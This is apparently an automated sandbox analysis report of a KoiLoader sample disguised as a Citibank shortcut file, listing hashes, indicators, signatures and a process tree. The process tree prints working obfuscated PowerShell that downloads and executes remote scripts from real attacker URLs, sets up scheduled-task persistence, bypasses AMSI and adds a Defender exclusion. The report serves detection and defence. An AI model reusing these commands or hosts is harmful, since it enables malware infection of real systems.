Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/03/2025, 10:24

General

  • Target

    citibank_feb_2025.lnk

  • Size

    1KB

  • MD5

    4faa35703e3c7a20143562b271ceca2f

  • SHA1

    2d87ff75eb532029ab63ed68971471589f28a847

  • SHA256

    7d7319a069e4ce6453f554bd52c6103db586c3615e8f1bbc59748b11b2c9a926

  • SHA512

    ab0659b71b2a6593a288d1fe869f3615dea4eb3684df62670f1bfb38b342a8a529fa933ee78743aa162d474ffaad7b9e381f6c3186d2bed798fb27f3bfa09133

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://www.centralelatterieti.com/wp-content/uploads/2020/obviation3S0.php

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.centralelatterieti.com/wp-content/uploads/2020/dazementxdy7.php

exe.dropper

https://www.centralelatterieti.com/wp-content/uploads/2020/subgularExtK.ps1

Extracted

Family

koiloader

C2

http://178.17.170.209/overglass.php

Attributes
  • payload_url

    https://www.centralelatterieti.com/wp-content/uploads/2020

Signatures

  • KoiLoader

    KoiLoader is a malware loader written in C++.

  • Koiloader family
  • Detects KoiLoader payload 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Indicator Removal: Clear Persistence 1 TTPs 1 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\citibank_feb_2025.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2024
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $pdw = $env:programdata + '\' + ('778ycf5h9kz2sm.js iagx9x77v'); $dwnf='Dow'+'nl'+'oadF'+'ile'; $b10frxwtardxmxv8j = New-Object Net.WebClient; $wsd = $b10frxwtardxmxv8j.DownloadString('https://www.centralelatterieti.com/wp-content/uploads/2020/obviation3S0.php'); $b10frxwtardxmxv8j.$dwnf('https://www.centralelatterieti.com/wp-content/uploads/2020/commendedtz4.php', '778ycf5h9kz2sm.js'); $b10frxwtardxmxv8j.$dwnf('https://www.centralelatterieti.com/wp-content/uploads/2020/caninusAXRu.php', 'iagx9x77v.js'); . ('scht'+'as'+'ks') /create /sc minute /mo 1 /f /tr ($wsd + $pdw) /tn iagx9x77v;
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1544
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\ProgramData\778ycf5h9kz2sm.js iagx9x77v" /tn iagx9x77v
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:1868
  • C:\Windows\system32\wscript.EXE
    C:\Windows\system32\wscript.EXE C:\ProgramData\778ycf5h9kz2sm.js iagx9x77v
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3408
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "schtasks /delete /tn iagx9x77v /f; wscript $env:programdata\iagx9x77v.js "
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3036
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /delete /tn iagx9x77v /f
        3⤵
          PID:2756
        • C:\Windows\system32\wscript.exe
          "C:\Windows\system32\wscript.exe" C:\ProgramData\iagx9x77v.js
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:2380
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$tp=[Ref].Assembly.GetTypes();$ppa = 'https://www.centralelatterieti.com/wp-content/uploads/2020/dazementxdy7.php'; $dnl = $null; $ppb = 'https://www.centralelatterieti.com/wp-content/uploads/2020/subgularExtK.ps1'; Foreach($tt in $tp) {if ($tt.Name -like '*m?iUt*s') {$c=$tt}}; $env:paths = '7z5BMUNXHBC4'; IEX(Invoke-WebRequest -UseBasicParsing $ppa); IEX(Invoke-WebRequest -UseBasicParsing $ppb)"
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2880
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'https://www.centralelatterieti.com/wp-content/uploads/2020/sd2.ps1')"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1528
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command IEX(IWR -UseBasicParsing 'https://www.centralelatterieti.com/wp-content/uploads/2020/sd2.ps1')
                6⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1440
    • C:\Windows\SysWOW64\DllHost.exe
      C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3636
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1704
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2012
    • C:\Windows\System32\wscript.exe
      C:\Windows\System32\wscript.exe "C:\ProgramData\r7c9e3874-223b-4aff-8f46-f254f1c18b94r.js"
      1⤵
        PID:2964
      • C:\Windows\System32\wscript.exe
        C:\Windows\System32\wscript.exe "C:\ProgramData\r7c9e3874-223b-4aff-8f46-f254f1c18b94r.js"
        1⤵
          PID:4256

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\778ycf5h9kz2sm.js

          Filesize

          198B

          MD5

          af9f1f2076317c03e21d56367e638af4

          SHA1

          61c4f850591f851acd3108104ef14f0fe32f95a6

          SHA256

          70835a8f7ea6c93942935a6f9fef1ae4591c22e873e3b06000ef01437f2090c1

          SHA512

          c280492024a902e3988c88dca7e21fc622df1bdf66796d9baf06a3b393550ac3d771589b0c51e7c246991d314c0729e7631cd1c08ba575683d9abdef7295b29c

        • C:\ProgramData\iagx9x77v.js

          Filesize

          1KB

          MD5

          d36df3544228afe581e8886017e93048

          SHA1

          71b120e025332dd41436aa80bdd69451ccce73b4

          SHA256

          3420e876136b101b00af9d2ef0f7ad032812b5a8686b7c4005302e26e562eac0

          SHA512

          6b669ff52aecd053b004e87e56f8bbb4a38190c6807c7b456202796bcea728a5194d191ba5caea926e373e4da09d93e51e616037ee7cb917bc2ba2da88ff98a5

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          2f57fde6b33e89a63cf0dfdd6e60a351

          SHA1

          445bf1b07223a04f8a159581a3d37d630273010f

          SHA256

          3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

          SHA512

          42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          968cb9309758126772781b83adb8a28f

          SHA1

          8da30e71accf186b2ba11da1797cf67f8f78b47c

          SHA256

          92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

          SHA512

          4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          793B

          MD5

          6a92dd46ca92b0a33a509e446bd853a1

          SHA1

          d3c95a1fbcce10d0cfbfaacf6a58a655f7c41c98

          SHA256

          b7d01979d7e1842453c41890df89acea843a80d0485c9bc8534eba877036a6cb

          SHA512

          88632ad38a326bfa1b1d3ba95cd48437ad122e8304e4f72d20b19c28cf509abb8a86b4a8a56888572852e3616915800fbddcce4b4ed89b221921398e229d2cf9

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          1bad2704664b4c1a190586ec492be65f

          SHA1

          1c98e6645c66774152c184d23f7a3178ce522e7b

          SHA256

          5950586396814b38bfdbb86757839fc8c7ce3eb73577775473c29ce6be81fe3e

          SHA512

          668553c12f1e5560baba826d5c8b139d7c7e323b6aa4e3723aaca479850f898c147d63cb77d305d715044db1e75cf501d6502ca214c7ed05ded424b230893bb0

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          64B

          MD5

          d8b9a260789a22d72263ef3bb119108c

          SHA1

          376a9bd48726f422679f2cd65003442c0b6f6dd5

          SHA256

          d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

          SHA512

          550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_caci5ptt.gyb.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/1440-103-0x00000000082C0000-0x0000000008310000-memory.dmp

          Filesize

          320KB

        • memory/1440-100-0x0000000007A30000-0x0000000007A52000-memory.dmp

          Filesize

          136KB

        • memory/1440-104-0x00000000083B0000-0x0000000008442000-memory.dmp

          Filesize

          584KB

        • memory/1440-102-0x0000000008210000-0x000000000822A000-memory.dmp

          Filesize

          104KB

        • memory/1440-101-0x0000000008790000-0x0000000008D34000-memory.dmp

          Filesize

          5.6MB

        • memory/1544-2-0x00007FFC48983000-0x00007FFC48985000-memory.dmp

          Filesize

          8KB

        • memory/1544-14-0x00007FFC48980000-0x00007FFC49441000-memory.dmp

          Filesize

          10.8MB

        • memory/1544-9-0x00000249BC480000-0x00000249BC4A2000-memory.dmp

          Filesize

          136KB

        • memory/1544-19-0x00007FFC48980000-0x00007FFC49441000-memory.dmp

          Filesize

          10.8MB

        • memory/1544-3-0x00007FFC48980000-0x00007FFC49441000-memory.dmp

          Filesize

          10.8MB

        • memory/2012-88-0x0000000007530000-0x0000000007538000-memory.dmp

          Filesize

          32KB

        • memory/2012-84-0x0000000007410000-0x0000000007421000-memory.dmp

          Filesize

          68KB

        • memory/2012-87-0x0000000007550000-0x000000000756A000-memory.dmp

          Filesize

          104KB

        • memory/2012-86-0x0000000007450000-0x0000000007464000-memory.dmp

          Filesize

          80KB

        • memory/2012-85-0x0000000007440000-0x000000000744E000-memory.dmp

          Filesize

          56KB

        • memory/2012-69-0x00000000070A0000-0x00000000070D2000-memory.dmp

          Filesize

          200KB

        • memory/2012-70-0x0000000070F70000-0x0000000070FBC000-memory.dmp

          Filesize

          304KB

        • memory/2012-80-0x0000000006490000-0x00000000064AE000-memory.dmp

          Filesize

          120KB

        • memory/2012-81-0x00000000070E0000-0x0000000007183000-memory.dmp

          Filesize

          652KB

        • memory/2012-82-0x0000000007280000-0x000000000728A000-memory.dmp

          Filesize

          40KB

        • memory/2012-83-0x0000000007490000-0x0000000007526000-memory.dmp

          Filesize

          600KB

        • memory/2880-35-0x0000000002560000-0x0000000002596000-memory.dmp

          Filesize

          216KB

        • memory/2880-56-0x00000000070E0000-0x00000000070ED000-memory.dmp

          Filesize

          52KB

        • memory/2880-55-0x0000000007000000-0x0000000007001000-memory.dmp

          Filesize

          4KB

        • memory/2880-54-0x0000000007160000-0x00000000077DA000-memory.dmp

          Filesize

          6.5MB

        • memory/2880-53-0x0000000005EF0000-0x0000000005F0A000-memory.dmp

          Filesize

          104KB

        • memory/2880-52-0x0000000005BD0000-0x0000000005C1C000-memory.dmp

          Filesize

          304KB

        • memory/2880-51-0x0000000005B20000-0x0000000005B3E000-memory.dmp

          Filesize

          120KB

        • memory/2880-49-0x00000000054E0000-0x0000000005834000-memory.dmp

          Filesize

          3.3MB

        • memory/2880-39-0x00000000053B0000-0x0000000005416000-memory.dmp

          Filesize

          408KB

        • memory/2880-38-0x0000000005340000-0x00000000053A6000-memory.dmp

          Filesize

          408KB

        • memory/2880-37-0x0000000004B70000-0x0000000004B92000-memory.dmp

          Filesize

          136KB

        • memory/2880-36-0x0000000004D10000-0x0000000005338000-memory.dmp

          Filesize

          6.2MB